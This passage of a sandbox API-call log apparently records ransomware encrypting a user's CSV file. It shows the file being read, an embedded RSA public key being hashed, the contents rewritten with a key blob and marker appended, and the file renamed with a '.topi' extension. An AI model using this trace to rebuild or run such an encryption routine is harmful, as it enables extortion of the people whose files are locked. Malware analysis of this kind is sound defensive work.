honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\J2iZYyqK4GgN.csv") returned=".csv" [0097.540] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\J2iZYyqK4GgN.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\zluf9crj\\j2izyyqk4ggn.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.541] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=20075) returned 1 [0097.541] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.546] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x4e45, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.546] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.547] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.547] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.547] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.547] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x4e6b, lpOverlapped=0x0) returned 1 [0097.548] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.548] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.548] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.548] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.548] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df338) returned 1 [0097.549] CryptCreateHash (in: hProv=0x6df338, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.549] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.549] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.549] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.549] GetLastError () returned 0x0 [0097.549] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.549] CryptReleaseContext (hProv=0x6df338, dwFlags=0x0) returned 1 [0097.549] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.549] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.549] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.550] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4e70) returned 0x99fc2d8 [0097.550] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb608 [0097.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e50 [0097.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb650 [0097.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e68 [0097.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e98 [0097.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4eb0 [0097.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.551] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e98 | out: hHeap=0x680000) returned 1 [0097.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4eb0 | out: hHeap=0x680000) returned 1 [0097.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0097.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4eb0 [0097.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4e98 [0097.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0097.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4eb0 | out: hHeap=0x680000) returned 1 [0097.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e98 | out: hHeap=0x680000) returned 1 [0097.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.553] GetCurrentThreadId () returned 0x8c4 [0097.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9bf0 [0097.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df338 [0097.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.553] GetCurrentThreadId () returned 0x8c4 [0097.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0097.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0097.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e98 [0097.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4eb0 [0097.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e80 [0097.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4ec8 [0097.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0097.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e98 | out: hHeap=0x680000) returned 1 [0097.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e98 [0097.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e98 | out: hHeap=0x680000) returned 1 [0097.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df338 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ec8 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4eb0 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e80 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e68 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb650 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.557] WriteFile (in: hFile=0x6a8, lpBuffer=0x99fc2d8*, nNumberOfBytesToWrite=0x4e66, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99fc2d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x4e66, lpOverlapped=0x0) returned 1 [0097.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fc2d8 | out: hHeap=0x680000) returned 1 [0097.557] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x4e6b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.557] WriteFile (in: hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.557] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.557] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.557] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.558] CloseHandle (hObject=0x6a8) returned 1 [0097.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6040 [0097.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8d0) returned 0x31cf750 [0097.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0097.559] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\J2iZYyqK4GgN.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\zluf9crj\\j2izyyqk4ggn.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\J2iZYyqK4GgN.csv.topi" (normalized: "c:\\users\\5p5nrgjn0js 